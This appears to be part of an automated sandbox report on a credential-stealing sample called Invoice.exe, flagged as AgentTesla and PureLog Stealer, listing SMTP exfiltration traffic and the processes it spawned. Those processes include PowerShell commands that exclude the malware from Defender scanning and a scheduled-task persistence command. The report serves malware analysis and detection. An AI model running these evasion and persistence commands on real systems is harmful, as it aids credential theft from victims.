2024-04-26 09:42:33 UTC	15	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 Data Ascii: 102.129.152.220

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 26, 2024 11:42:13.089484930 CEST	587	49735	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:12:12 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:42:13.089674950 CEST	49735	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:42:13.297771931 CEST	587	49735	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:42:13.297962904 CEST	49735	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:42:13.506865025 CEST	587	49735	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:42:16.239872932 CEST	587	49738	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:12:16 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:42:16.240041018 CEST	49738	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:42:16.447257042 CEST	587	49738	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:42:16.447426081 CEST	49738	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:42:16.655317068 CEST	587	49738	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:42:26.400362968 CEST	587	49740	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:12:26 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:42:26.400832891 CEST	49740	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:42:26.608217001 CEST	587	49740	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:42:26.608366013 CEST	49740	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:42:26.817341089 CEST	587	49740	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:42:34.590336084 CEST	587	49748	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:12:34 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:42:34.590563059 CEST	49748	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:42:34.798264027 CEST	587	49748	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:42:34.798676014 CEST	49748	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:42:35.007111073 CEST	587	49748	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:43:50.413743019 CEST	587	49750	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:13:50 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:43:50.482851028 CEST	49750	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:43:50.499469042 CEST	587	49751	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:13:50 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:43:50.510373116 CEST	49751	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:43:50.690710068 CEST	587	49750	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:43:50.690901041 CEST	49750	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:43:50.718558073 CEST	587	49751	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:43:50.721179008 CEST	49751	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:43:50.899245024 CEST	587	49750	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:43:50.929924965 CEST	587	49751	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:43:56.001477957 CEST	587	49752	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:13:55 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:43:56.009318113 CEST	49752	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:43:56.217410088 CEST	587	49752	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:43:56.217854977 CEST	49752	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:43:56.426593065 CEST	587	49752	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:43:57.367244005 CEST	587	49753	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:13:57 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:43:57.367377996 CEST	49753	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:43:57.453207016 CEST	587	49754	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:13:57 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:43:57.453408957 CEST	49754	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:43:57.574903011 CEST	587	49753	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:43:57.575025082 CEST	49753	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:43:57.663554907 CEST	587	49754	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:43:57.669334888 CEST	49754	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:43:57.783396959 CEST	587	49753	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:43:57.878052950 CEST	587	49754	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:44:00.217969894 CEST	587	49754	207.174.215.249	192.168.2.4	421 Lost incoming connection
Apr 26, 2024 11:44:00.517891884 CEST	587	49755	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:14:00 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:44:00.518105984 CEST	49755	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:44:00.725336075 CEST	587	49755	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:44:00.725677967 CEST	49755	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:44:00.933770895 CEST	587	49755	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:44:02.862263918 CEST	587	49756	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:14:02 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:44:02.862397909 CEST	49756	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:44:03.070394993 CEST	587	49756	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:44:03.070578098 CEST	49756	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:44:03.279444933 CEST	587	49756	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:44:04.792920113 CEST	587	49756	207.174.215.249	192.168.2.4	421 md-35.webhostbox.net lost input connection
Apr 26, 2024 11:44:05.186743021 CEST	587	49757	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:14:05 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:44:05.186861992 CEST	49757	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:44:05.394814968 CEST	587	49757	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:44:05.394974947 CEST	49757	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:44:05.603620052 CEST	587	49757	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:44:33.640499115 CEST	587	49761	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:14:33 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:44:33.640610933 CEST	49761	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:44:33.849042892 CEST	587	49761	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:44:33.849245071 CEST	49761	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:44:34.058223009 CEST	587	49761	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:44:43.136902094 CEST	587	49762	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:14:43 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:44:43.137058973 CEST	49762	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:44:43.344675064 CEST	587	49762	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:44:43.344803095 CEST	49762	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:44:43.553116083 CEST	587	49762	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:44:47.359761000 CEST	587	49763	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:14:47 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:44:47.359898090 CEST	49763	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:44:47.568229914 CEST	587	49763	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:44:47.568375111 CEST	49763	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:44:47.777394056 CEST	587	49763	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:44:49.279215097 CEST	587	49764	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:14:49 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:44:49.279356003 CEST	49764	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:44:49.488910913 CEST	587	49764	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:44:49.489090919 CEST	49764	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:44:49.699887991 CEST	587	49764	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:45:10.578198910 CEST	587	49765	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:15:10 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:45:10.578403950 CEST	49765	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:45:10.786524057 CEST	587	49765	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:45:10.786886930 CEST	49765	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:45:10.995574951 CEST	587	49765	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:45:27.041454077 CEST	587	49766	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:15:26 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:45:27.041594028 CEST	49766	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:45:27.249393940 CEST	587	49766	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:45:27.249588013 CEST	49766	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:45:27.457988024 CEST	587	49766	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:45:28.989094019 CEST	587	49767	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:15:28 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:45:28.989245892 CEST	49767	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:45:29.197009087 CEST	587	49767	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:45:29.197160006 CEST	49767	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:45:29.405467033 CEST	587	49767	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:45:31.969954014 CEST	587	49767	207.174.215.249	192.168.2.4	421 Lost incoming connection
Apr 26, 2024 11:45:32.325469971 CEST	587	49768	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:15:32 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:45:32.329174042 CEST	49768	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:45:32.536891937 CEST	587	49768	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:45:32.537190914 CEST	49768	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:45:32.543776035 CEST	587	49769	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:15:32 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:45:32.543955088 CEST	49769	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:45:32.747734070 CEST	587	49768	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:45:32.751692057 CEST	587	49769	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:45:32.751847982 CEST	49769	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:45:32.960619926 CEST	587	49769	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:45:52.345148087 CEST	587	49770	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:15:52 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:45:52.345470905 CEST	49770	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:45:52.553441048 CEST	587	49770	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:45:52.553627014 CEST	49770	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:45:52.762223959 CEST	587	49770	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:46:20.200963020 CEST	587	49771	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:16:20 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:46:20.201078892 CEST	49771	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:46:20.408931017 CEST	587	49771	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:46:20.409055948 CEST	49771	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:46:20.617633104 CEST	587	49771	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:46:21.778254986 CEST	587	49772	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:16:21 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:46:21.778376102 CEST	49772	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:46:21.985841036 CEST	587	49772	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:46:21.986093998 CEST	49772	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:46:22.195461035 CEST	587	49772	207.174.215.249	192.168.2.4	220 TLS go ahead
Apr 26, 2024 11:46:22.285024881 CEST	587	49773	207.174.215.249	192.168.2.4	220-md-35.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 15:16:22 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 26, 2024 11:46:22.285708904 CEST	49773	587	192.168.2.4	207.174.215.249	EHLO 445817
Apr 26, 2024 11:46:22.493719101 CEST	587	49773	207.174.215.249	192.168.2.4	250-md-35.webhostbox.net Hello 445817 [102.129.152.220] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 26, 2024 11:46:22.494149923 CEST	49773	587	192.168.2.4	207.174.215.249	STARTTLS
Apr 26, 2024 11:46:22.703494072 CEST	587	49773	207.174.215.249	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	11:42:06
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\Invoice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice.exe"
Imagebase:	0xa50000
File size:	841'728 bytes
MD5 hash:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1721400076.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1711744311.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:42:08
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe"
Imagebase:	0xdc0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:42:08
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:42:08
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe"
Imagebase:	0xdc0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:42:08
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:42:08
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpA865.tmp"
Imagebase:	0xc50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:42:08
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:42:09
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\Invoice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Invoice.exe"
Imagebase:	0x3c0000
File size:	841'728 bytes
MD5 hash:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:42:09
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\Invoice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Invoice.exe"
Imagebase:	0x380000
File size:	841'728 bytes
MD5 hash:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:42:09
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\Invoice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Invoice.exe"
Imagebase:	0x5e0000
File size:	841'728 bytes
MD5 hash:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.4154310279.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.4154310279.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	11:42:10
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe
Imagebase:	0x270000
File size:	841'728 bytes
MD5 hash:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1756637194.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1756637194.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1756637194.000000000426F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1756637194.000000000426F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
